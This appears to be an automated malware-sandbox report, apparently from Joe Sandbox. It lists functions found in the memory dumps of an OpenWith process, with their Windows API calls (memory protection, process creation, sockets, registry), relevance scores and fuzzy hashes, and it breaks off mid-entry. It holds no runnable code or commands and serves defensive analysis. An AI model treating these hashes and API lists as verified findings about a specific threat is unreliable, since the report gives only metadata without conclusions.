APIs

RtlFreeHeap.NTDLL ref: 0000011F7ABB36F9

Strings

l, xrefs: 0000011F7ABB33D6

Memory Dump Source

Source File: 00000006.00000003.1502016342.0000011F7ABB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F7ABB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_11f7abb0000_OpenWith.jbxd

Similarity

API ID: FreeHeap
String ID: l
API String ID: 3298025750-2517025534
Opcode ID: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction ID: f17c56b97b81f423b90780d65746fe7624644298064fed736bb30e0cff8d49f6
Opcode Fuzzy Hash: 945787e355e9cefb289f3126088299a2a592093c218b6f331fdd883cb8990c47
Instruction Fuzzy Hash: A3A10331518A580AE72DAA2C88916FA77D1FB95300F1D0A7EE5DBC39C3ED34D94F8681

Function 00007DF46E4C95F8 Relevance: 3.4, APIs: 2, Instructions: 397COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4DAF60: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,00000000,?,?,00000000,00007DF46E4C341C), ref: 00007DF46E4DAF8A

CreateFileMappingW.KERNELBASE ref: 00007DF46E4C98AE
calloc.MSVCRT ref: 00007DF46E4C99E8

Part of subcall function 00007DF46E4C9478: CreateFileW.KERNELBASE ref: 00007DF46E4C94D0

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CreateFile$AcceptConnectMappingPortcalloc
String ID:
API String ID: 2835849967-0
Opcode ID: d1b445dc56701135788b0dc920e68535db059dd4faca11d9a453a424e093dfee
Instruction ID: a780bfdde682d9568ffa982ff55727aae413464a90c8111dca6af1beec9d32c0
Opcode Fuzzy Hash: d1b445dc56701135788b0dc920e68535db059dd4faca11d9a453a424e093dfee
Instruction Fuzzy Hash: 4DD15F7191C7898BE765DF28D4856EBB7E0FB94700F04462EE48FC3291DF34A5458B86

Function 00007DF46E5AC8B4 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E5AC9A0

Strings

X, xrefs: 00007DF46E5AC8C5

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc
String ID: X
API String ID: 2803490479-3081909835
Opcode ID: 9fe5fd8fd3d476687bc9124c984f097206d03f3ab6c64bd830142eb49153f5ac
Instruction ID: 324f300cdf6eacd3fb33885ab2491e8b12ebabf70cd893db1e5d785dccff794b
Opcode Fuzzy Hash: 9fe5fd8fd3d476687bc9124c984f097206d03f3ab6c64bd830142eb49153f5ac
Instruction Fuzzy Hash: 1C71B3B0919B088FE768DF6CC4852B677E4FB49310B10063FD89BC7692D734B8428B85

Function 00007DF46E4DDDA4 Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4DDADC: malloc.MSVCRT ref: 00007DF46E4DDAE6

CreateFileW.KERNELBASE ref: 00007DF46E4DDEBA
ReadFile.KERNELBASE ref: 00007DF46E4DDFA2

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID:
API String ID: 3950102678-0
Opcode ID: b879bc7b5dc6143657be184a8553957d82cf9a437ba6bdf4bbb2c4680e42a6eb
Instruction ID: 2ff49cca8b3ace95513e374c1ce3e0ffac3b84a942258031b1acda4da739e5c2
Opcode Fuzzy Hash: b879bc7b5dc6143657be184a8553957d82cf9a437ba6bdf4bbb2c4680e42a6eb
Instruction Fuzzy Hash: CF719870A0CB594FE7599F2894C57ABB2E1FB98301F50053FE58FC3292DA38D885CA46

Function 00007DF46E4B22DC Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007DF46E4B22F4
VirtualAlloc.KERNELBASE ref: 00007DF46E4B23C0

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AllocInfoSystemVirtual
String ID:
API String ID: 3440192736-0
Opcode ID: 10974d638571623cb466fc5259723849182c6a649d453933aa228a33d07da908
Instruction ID: 20bd2031ec1ca39aaf5e2531ea83a8891d84b7f2a8686d04ba845f13d68c6344
Opcode Fuzzy Hash: 10974d638571623cb466fc5259723849182c6a649d453933aa228a33d07da908
Instruction Fuzzy Hash: ED51D37061CE5E4FEB55AB7D98487BB72E1FB98300F04013AD44EC7595EE68E8C18789

Function 00007DF46E4C9478 Relevance: 3.2, APIs: 2, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007DF46E4C94D0
ReadFile.KERNELBASE ref: 00007DF46E4C9585

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: 73db5555d885fd7ea61d85234132b183eb459049274d5711c35081ec0b7aef7a
Instruction ID: 7e7bcd7290743a0d1f36a9541ff54a39184c6f1abf8602ccdc43d31be947867f
Opcode Fuzzy Hash: 73db5555d885fd7ea61d85234132b183eb459049274d5711c35081ec0b7aef7a
Instruction Fuzzy Hash: 2241E6B170C6494FD748EF28988566B73E5FB98B05F14462EE94FC3250EE35D8418786

Function 00007DF46E4DD974 Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007DF46E4DD9AB
ReadFile.KERNELBASE ref: 00007DF46E4DD9E1

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: 6dcf9cfff2eacf5cd94369649f002897bcffdea66228e64647734ab7a70026dd
Instruction ID: 250177be1f20c7a1194f267b73ecf8e6b2b8840b651ab9b7c207919b9c123498
Opcode Fuzzy Hash: 6dcf9cfff2eacf5cd94369649f002897bcffdea66228e64647734ab7a70026dd
Instruction Fuzzy Hash: 232108B070C7455FE7649F6D98862BB73D4EB89710F10023FE88FC2342DA75AC464A86

Function 00007DF46E4B2980 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF46E4B29BF
VirtualProtect.KERNELBASE ref: 00007DF46E4B2A25

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e54d32ce24f4b710544f648fa16c64d8d7f0589b34fc61474f65512f49413183
Instruction ID: 9f66a14e27e44028a172e678bb1a7b9980d75590897e115507e7fc930bcfeaef
Opcode Fuzzy Hash: e54d32ce24f4b710544f648fa16c64d8d7f0589b34fc61474f65512f49413183
Instruction Fuzzy Hash: 2831F72171CA864BD7149B7C9C987A63BD1FB5A310F1502A6E88EC72C5CB589842C389

Function 00007DF46E4D8F84 Relevance: 2.9, APIs: 2, Instructions: 414COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007DF46E4D9008
free.MSVCRT ref: 00007DF46E4D93FA

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: callocfree
String ID:
API String ID: 306872129-0
Opcode ID: 2b200ceb4e4cc9f035faf7b6c1b247c7413155f6bad845cc72cf0ce4a6dd00dc
Instruction ID: a56776dfc3694b822a3087bf4087edf29085afb246e341137e737adf283d86fa
Opcode Fuzzy Hash: 2b200ceb4e4cc9f035faf7b6c1b247c7413155f6bad845cc72cf0ce4a6dd00dc
Instruction Fuzzy Hash: DDD1617161CA894BE765EF6884A56EF73E1FF98300F00062BE54FC3182DA79F5858686

Function 00007DF46E4B4774 Relevance: 2.7, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4B494C
free.MSVCRT ref: 00007DF46E4B49F3

Part of subcall function 00007DF46E4B4620: malloc.MSVCRT ref: 00007DF46E4B46EF

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 352f2f2cecbb3e27f866ef48949e4e4dcfd5ee98b9eced5f0af6e5ea8a5601e0
Instruction ID: 65a0b5be48702d3b40f08b8e49ec6850abd57a13b574101a04cecd9b716ed64c
Opcode Fuzzy Hash: 352f2f2cecbb3e27f866ef48949e4e4dcfd5ee98b9eced5f0af6e5ea8a5601e0
Instruction Fuzzy Hash: 8F71A771A1C9854BD739A73898956EFB2E1FBD5301F10466FE08FC2183ED38B5868689

Function 00007DF46E4CCC5C Relevance: 2.6, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4DACC8: NtAcceptConnectPort.NTDLL ref: 00007DF46E4DACD8

malloc.MSVCRT ref: 00007DF46E4CCD0D
free.MSVCRT ref: 00007DF46E4CCD94

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPortfreemalloc
String ID:
API String ID: 3413200017-0
Opcode ID: 694a03a6a0a341675988201f7685504af8169e7f1b53cb1e5f9007a100a90dea
Instruction ID: c22a93d73c8e0b7c05a5f0f7e051db56702dd702abc5526ad50a695103b40dfc
Opcode Fuzzy Hash: 694a03a6a0a341675988201f7685504af8169e7f1b53cb1e5f9007a100a90dea
Instruction Fuzzy Hash: D0415FB0508A488FDB54EF29D8856E677E1FF58711F00056BE84ECB251DF34E885CB82

Function 00007DF46E4D35F4 Relevance: 2.6, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4D3683
malloc.MSVCRT ref: 00007DF46E4D36C2

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 31b51a1252b2397096177e19cb7010b666d546ef653b70412147a1dab026b8b6
Instruction ID: 0e7eec1e5eba582b14762ab0429ee7078cdd5c16a93d7e35acf7984bc1a01476
Opcode Fuzzy Hash: 31b51a1252b2397096177e19cb7010b666d546ef653b70412147a1dab026b8b6
Instruction Fuzzy Hash: 0D41A270608D0E9FDB94EF2CD888AA677F1FBA8311714466BD41AC3660DB74E8D48BC0

Function 00007DF46E5AABFC Relevance: 2.6, APIs: 2, Instructions: 89COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E5AAC7D
free.MSVCRT ref: 00007DF46E5AAC91

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction ID: b718468b24ecc55863f3e72cff04cbe04c26251a5023b3c92ad377beb57d43db
Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction Fuzzy Hash: BB214970A098584FFF94EB5CC0E8DA677E2FF983107651261E91FC719AD625DC80D784

Function 00007DF46E4CCA08 Relevance: 2.6, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF46E4CD046), ref: 00007DF46E4CCA30

Part of subcall function 00007DF46E4DBCC0: malloc.MSVCRT ref: 00007DF46E4DBCE6
Part of subcall function 00007DF46E4DBCC0: NtAcceptConnectPort.NTDLL ref: 00007DF46E4DBD8F

free.MSVCRT ref: 00007DF46E4CCA66

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPortcallocfreemalloc
String ID:
API String ID: 2445003351-0
Opcode ID: 1c81860f17a6367f43a2a94f10a5d32e0a9fa92ddff0a1d18b0803ced88c0a31
Instruction ID: fdab9524905a78a3fc9f5e0397252365672babbaf8520dbbfca2bd2e0142e469
Opcode Fuzzy Hash: 1c81860f17a6367f43a2a94f10a5d32e0a9fa92ddff0a1d18b0803ced88c0a31
Instruction Fuzzy Hash: F0F02831214D0C4FD748AB2C9C8C6B637E1EB94726714462BE00BC7260DD78DD40C780

Function 00007DF46E4D6720 Relevance: 2.2, APIs: 1, Instructions: 947COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007DF46E4D6956

Part of subcall function 00007DF46E4D8F84: calloc.MSVCRT ref: 00007DF46E4D9008

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: 4c67779dd63165b43659fab8fd510d9b574d13d676e16a29e3859926c8de3004
Instruction ID: 10905f04877b058baeb7421cfcb7e53c4366e8fa298194493479d4c159ee29dc
Opcode Fuzzy Hash: 4c67779dd63165b43659fab8fd510d9b574d13d676e16a29e3859926c8de3004
Instruction Fuzzy Hash: F672727051CA898BDB69EF28D495ADFB3E1FF94300F10466EE48F83296DE34E4858746

Function 00007DF46E4C913C Relevance: 1.8, APIs: 1, Instructions: 316COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE ref: 00007DF46E4C9372

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 090a60165b6d81dbbef6ccd1718067ffa9bcceaffdfa6db13320491a5d5642c1
Instruction ID: cff1d0a5bc1abc4450b1e223cf614c94f53abe500ffe8c3a24a0f39a24f93065
Opcode Fuzzy Hash: 090a60165b6d81dbbef6ccd1718067ffa9bcceaffdfa6db13320491a5d5642c1
Instruction Fuzzy Hash: 01A14FB161CA898FDB54EF29C8849ABB7F1FB94700F404A6EE04FC7191DA34E585CB85

Function 00007DF46E4D5004 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32 ref: 00007DF46E4D5225

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e8d5d7329d2320a05d82013e26ca3d8c66ee9948d03da3e8e50157f1609a8dd5
Instruction ID: dafe9a70f2af5d53733a8a39329e7a2f02c122dd8888134e36f2e793cf0ed0e8
Opcode Fuzzy Hash: e8d5d7329d2320a05d82013e26ca3d8c66ee9948d03da3e8e50157f1609a8dd5
Instruction Fuzzy Hash: CA91BC7560DB899FE765EF64C488B9BB7E1FB98301F00492BE48AC3260DB34D544CB42

Function 00007DF46E504B28 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32 ref: 00007DF46E504BDF

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: d8e018eafecf73722f3cfd2108c578dd3fd3213e6426fbbfe5b50f999653df9c
Instruction ID: 524e37cb58aa473081c31b2145f2249bdc4e5b329c69dfd827a0dfc069f57b0c
Opcode Fuzzy Hash: d8e018eafecf73722f3cfd2108c578dd3fd3213e6426fbbfe5b50f999653df9c
Instruction Fuzzy Hash: E8819FB0508A498FEB98DF68C4987A6B7E0FF64314F00426AE40EC7691EB35E851CB85

Function 00007DF46E4C5960 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 00007DF46E4C5B1D

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 458a1419ed12d8a3c2e86420f2914f8409b820493848f008ec8053e1bf8f0b77
Instruction ID: 1edcf414c3a61005784d08d7996b0a7e3ad106885cb90b4acf90431d3f620853
Opcode Fuzzy Hash: 458a1419ed12d8a3c2e86420f2914f8409b820493848f008ec8053e1bf8f0b77
Instruction Fuzzy Hash: B2617EB150C7898BE765EF65D8956EBB7E1FB94300F000A2EE08FC3191DE39A545CB46

Function 00007DF46E4DD6FC Relevance: 1.7, APIs: 1, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00007DF46E4DD7F5

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e9169745a3f5c8f3addee9eb58fc29d082d9d243fdbbd28d7b824531286ef21a
Instruction ID: ddb4d43b26dd4f1d1907c5ee28a334cf60b24ab0972d5068b0be056682c14a77
Opcode Fuzzy Hash: e9169745a3f5c8f3addee9eb58fc29d082d9d243fdbbd28d7b824531286ef21a
Instruction Fuzzy Hash: 80516E70A0C7895BE765DB68D8457ABB3E5FFD5310F000A2FE48AC3191DB78E8418B46

Function 00007DF46E504520 Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF46E5045BF

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 7916fdf4d3e942b440d7f5c412e90116e139ebed5d60f444feec34680a904e5a
Instruction ID: 88f1ac002ee6621213b6f265a8f693aadbc32b6b705079b59871f3048a367797
Opcode Fuzzy Hash: 7916fdf4d3e942b440d7f5c412e90116e139ebed5d60f444feec34680a904e5a
Instruction Fuzzy Hash: 175148B0508A898FEBA4EF69C498B9777F0FF64314F50056AE44BC3561EB39E840CB45

Function 00007DF46E594934 Relevance: 1.7, APIs: 1, Instructions: 401COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007DF46E594A1F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: 6627cfbe9fd8d1ed5517d68a071bfa190fd008ef314ddf0e2e91dc369a45b12d
Instruction ID: 2f3af9619e1ffb0c7af9b43ced4e8f3c3371430a617383dbbc8804e35d680af3
Opcode Fuzzy Hash: 6627cfbe9fd8d1ed5517d68a071bfa190fd008ef314ddf0e2e91dc369a45b12d
Instruction Fuzzy Hash: 3CB1F87191CADC4FEB68AB6C84956EB73E1EB94300F50052FD59FC3182E929EC474689

Function 00007DF46E4C52E4 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007DF46E4C537F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 6ecee242a2d9719518cb049206fbca905074d49784de06f99d83231cef7de4a6
Instruction ID: 2f8e884a27c3a303e5fbc573a070a650e8bef1def67f30a8e1e0caa75b114c18
Opcode Fuzzy Hash: 6ecee242a2d9719518cb049206fbca905074d49784de06f99d83231cef7de4a6
Instruction Fuzzy Hash: 6C41BFB06189498BDB58EF39C8845EBB3E1FF98310B50436BE40FC7192DA38E985C785

Function 00007DF46E4C7B7C Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4C65E0: VirtualProtect.KERNELBASE ref: 00007DF46E4C6640
Part of subcall function 00007DF46E4C65E0: VirtualProtect.KERNELBASE ref: 00007DF46E4C6669
Part of subcall function 00007DF46E4C65E0: VirtualProtect.KERNELBASE ref: 00007DF46E4C6685
Part of subcall function 00007DF46E4C65E0: VirtualProtect.KERNELBASE ref: 00007DF46E4C66B0

TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF46E4C341C), ref: 00007DF46E4C7CB7

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual$Free
String ID:
API String ID: 3841229516-0
Opcode ID: 9454607179550a56fcb25c77309fc397396c8818e949c4bf6b88fbdfb1fa50f0
Instruction ID: bd7afeb766278fb3e2be2f0239e3aff699450112bcf71c41e6553e9bf4862468
Opcode Fuzzy Hash: 9454607179550a56fcb25c77309fc397396c8818e949c4bf6b88fbdfb1fa50f0
Instruction Fuzzy Hash: B841A7B0B0CA4A4BDB54EB3994C95EF73E1EF49B00B044677E41BC72C6DA28F8858795

Function 00007DF46E4C3320 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF46E4B3DD8: RtlAddFunctionTable.KERNEL32 ref: 00007DF46E4B3E05

SetErrorMode.KERNELBASE ref: 00007DF46E4C3408

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ErrorFunctionModeTable
String ID:
API String ID: 928017140-0
Opcode ID: d9c23544fbb2a9f569b4c70e99ee3ada11af114710c16124923c5dd5b1b488fd
Instruction ID: abb0626fddcae112241c764052ff352e1e43a7eab5428cd7fbb3ca4de723bcaa
Opcode Fuzzy Hash: d9c23544fbb2a9f569b4c70e99ee3ada11af114710c16124923c5dd5b1b488fd
Instruction Fuzzy Hash: EC31BFA171C89A4BEB54FB7A98866EB32E1EF44710B40067ED00FC31D2DD18EDC54249

Function 00007DF46E5052D0 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF46E505344

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 5ecb9aca37cfa74a852660f22e24977ddf5ffe3d9d8c212dab6545ea967c75f3
Instruction ID: 59053acf83fa58f918b7a08ed2b51c5655fdbee812bf3e06f273e94e539a1494
Opcode Fuzzy Hash: 5ecb9aca37cfa74a852660f22e24977ddf5ffe3d9d8c212dab6545ea967c75f3
Instruction Fuzzy Hash: 6B31FCB0904A458FFBA8DF58C0987A277E5FF54325F1402AAE81ECB2E6D7749881CB44

Function 0000011F791B185C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessMitigationPolicy.KERNELBASE ref: 0000011F791B192F

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction ID: 28fb2297dd0a2799e23a7d1fbbeeafb6c95a8fb07f05bf4172b2c6f6430906ed
Opcode Fuzzy Hash: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction Fuzzy Hash: 89319E30240A4A4AFB7DD768A8847E173D7FB943B1F1B11BDC219CA1D1FAB1D8A28740

Function 00007DF46E4C5328 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007DF46E4C537F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 444279a65ed160c075670131e7138b44e5ba453f7519e9f4e47c8cdc32b69109
Instruction ID: f90ac7677c201073310c4f314179f08b3d2e548284b46b48988ffa45460dfa2b
Opcode Fuzzy Hash: 444279a65ed160c075670131e7138b44e5ba453f7519e9f4e47c8cdc32b69109
Instruction Fuzzy Hash: CF21A1B060858A8BDF54EF2988845EFB7E2FFD8711B50836AD40FC7092C638E985C745

Function 00007DF46E4B2910 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00007DF46E4B2948

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a1e79bfd5fdfa4d599be838d72d64bf9e685b5698f2b0b05ab8498b458f49234
Instruction ID: de7ef6020a371f76cba1e16384a79bb179050f854d41ffaf02bb67f781f38b68
Opcode Fuzzy Hash: a1e79bfd5fdfa4d599be838d72d64bf9e685b5698f2b0b05ab8498b458f49234
Instruction Fuzzy Hash: 2601D631B1491A8FEB94AB79DC8867737E5FF893517040476E80EC7154DE39AC82C789

Function 00007DF46E4B2BB0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE ref: 00007DF46E4B2BF6

Memory Dump Source

